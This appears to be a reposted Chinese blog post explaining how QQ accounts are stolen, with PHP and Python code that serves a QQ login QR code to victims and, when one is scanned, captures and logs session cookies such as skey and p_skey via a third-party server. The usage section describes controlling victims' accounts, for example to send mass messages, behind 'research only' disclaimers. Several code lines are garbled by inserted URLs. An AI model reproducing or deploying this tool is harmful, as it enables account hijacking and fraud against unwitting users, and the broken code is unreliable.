起因
最近突然對之前發生QQ盜號事件有點興趣,對其中的原理有點好奇,于是研究了一下,
得出以下的結果,以下代碼,僅作研究參考,請勿用于違法用途,否則造成的嚴重后果自行承擔!
代碼展示
PHP介面代碼
<?php
error_reporting(0);
header('content-type:application/json');
function request_http($url, $type=0, $post_data='', $ua='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.58', $cookie='', $header=array(), $redirect=true){
// 初始化curl
$curl = curl_init();
// 設定網址
curl_setopt($curl,CURLOPT_URL, $url);
// 設定UA
if (empty($ua) == false) {
$header[] = 'User-Agent:'.$ua;
}
// 設定Cookie
if (empty($cookie) == false) {
$header[] = 'Cookie:'.$cookie;
}
// 設定請求頭
if (empty($ua) == false or empty($cookie) == false or empty($header) == false) {
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
}
// 設定POST資料
if($type == 1){
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
}
// 設定重定向
if ($redirect == false) {
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
}
// 過SSL驗證證書
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
// 將頭部作為資料流輸出
curl_setopt($curl, CURLOPT_HEADER, true);
// 設定以變數形式存盤回傳資料
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// 請求并存盤資料
$return = curl_exec($curl);
// 分割頭部和身體
if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '200') {
$return_header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$return_header = substr($return, 0, $return_header_size);
$return_data = https://www.cnblogs.com/ouhouyi/archive/2022/09/08/substr($return, $return_header_size);
}
// 關閉cURL
curl_close($curl);
// 回傳資料
return [$return_header, $return_data];
}
function return_result($state, $info) {
$result = array('state'=>$state,
'info'=>$info
);
exit(stripslashes(json_encode($result, JSON_UNESCAPED_UNICODE)));
}
function get_middle_text($text, $text_left, $text_right) {
$left = strpos($text, $text_left);
$right = strpos($text, $text_right, $left);
if ($left < 0 or $right < $left) {
return False;
};
return substr($text, $left + strlen($text_left), $right - $left - strlen($text_left));
}
function get_ptqrtoken($qrsig) {
$len = strlen($qrsig);
$hash = 0;
for ($i = 0; $i < $len; $i++) {
$hash += (($hash << 5) & 2147483647) + ord($qrsig[$i]) & 2147483647;
$hash &= 2147483647;
}
return $hash & 2147483647;
}
function get_result_data($qrsig){
$state_data = https://www.cnblogs.com/ouhouyi/archive/2022/09/08/request_http('https://ssl.ptlogin2.qq.com/ptqrlogin?u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptqrtoken='.get_ptqrtoken($qrsig).'&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-'.time().'&js_ver=10233&js_type=1&login_sig='.$qrsig.'&pt_uistyle=40&aid=549000912&daid=5', null, null, null, 'qrsig='.$qrsig)[1];
if (strpos($state_data, '未失效') == true) {
return '未失效';
}
elseif (strpos($state_data, '認證中') == true) {
return '認證中';
}
elseif (strpos($state_data, '登錄成功') == true) {
$ptuicb_url = get_middle_text($state_data, "'0','0','", "','1',");
$ptuicb_header = request_http($ptuicb_url, null, null, null, null, null, false)[0];
$cookie = 'uin='.get_middle_text($ptuicb_header, 'uin=', ';').';skey='.get_middle_text($ptuicb_header, 'skey=', ';').';p_uin='.get_middle_text($ptuicb_header, 'p_uin=', ';').';p_skey='.get_middle_text($ptuicb_header, 'p_skey=', ';').';pt4_token='.get_middle_text($ptuicb_header, 'pt4_token=', ';');
return ['已登錄', $cookie];
}
elseif (strpos($state_data, '已失效') == true) {
return '已失效';
}
}
function get_login_data(){
$return = request_http('https://ssl.ptlogin2.qq.com/ptqrshow?appid=549000912&e=2&l=M&s=3&d=72&v=4&t='.time().'&daid=5&pt_3rd_aid=0');
$qrsig = get_middle_text($return[0], 'qrsig=', ';');
$qr_code = 'data:image/jpeg;base64,'.base64_encode($return[1]);
return [$qrsig, $qr_code];
}
$TYPE = $_REQUEST['type'];
$QRSIG = $_REQUEST['qrsig'];
if (empty($TYPE) == true or ($TYPE != 'get' and empty($QRSIG) == true)) {
return_result(100, '引數錯誤');
}
elseif ($TYPE == 'get') {
$login_data = https://www.cnblogs.com/ouhouyi/archive/2022/09/08/get_login_data();
$result = array('qrsig'=>$login_data[0],
'qr_code'=>$login_data[1]
);
return_result(200, $result);
}
elseif ($TYPE == 'result') {
$result_data = https://www.cnblogs.com/ouhouyi/archive/2022/09/08/get_result_data($QRSIG);
if (is_string($result_data) == True) {
$result = $result_data;
}
else{
$result = array('state'=>$result_data[0],
'cookie'=>$result_data[1]
);
}
return_result(200, $result);
}
else{
return_result(100, '型別錯誤');
}
?>
Python呼叫代碼
import requests
import os
import time
class GetSkey(object):
def __init__(self):
self.url = "https://ssl.ptlogin2.qq.com/ptqrshow?appid=549000912&e=2&l=M&s=3&d=72&v=4&daid=5&pt_3rd_aid=0"
self.url2 = "https://www.5131499.xyz/qq.php"
if not os.path.exists('qr'):
os.makedirs('qr')
else:
pass
def run(self):
while True:
r = requests.get(self.url)
with open("./qr/qrsig.png", 'wb') as f:
f.write(r.content)
qrsig = r.cookies['qrsig']
print(qrsig)
while True:
qj = requests.get(self.url2, params={'type': 'result', 'qrsig': qrsig})
getskey = qj.json()
print(getskey['info'])
if getskey['info'] == '未失效':
pass
elif getskey['info'] == '認證中':
pass
elif getskey['info'] == '已失效':
break
else:
with open("./qr/qrsig.txt", 'a', encoding='utf-8') as f:
f.write(getskey['info']["cookie"]+'\n')
print(getskey['info']["cookie"])
break
time.sleep(3)
if __name__ == "__main__":
start = GetSkey()
start.run()
使用
可以把PHP的代碼掛到你的網站,然后用python進行呼叫,python代碼根目錄下會生成一個qr檔案夾,
qr檔案夾里面有生成的二維碼(python代碼會自動判斷二維碼是否還有效,然后重新生成),只要有人掃描該二維碼并登錄,檔案夾內會生成一個txt文本,里面會記錄有QQ的skey等資訊,而有了QQ的skey等資訊,就可以操控QQ做很多事情了,
比如:群發訊息等,
有能力的也可以把PHP轉為python代碼,我懶得轉了,
就這樣吧...
最后再提醒一句,代碼僅作研究參考,請勿用于違法用途,否則造成的嚴重后果自行承擔!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/505962.html
標籤:其他
上一篇:藍牙5.0對比4.2的主要優勢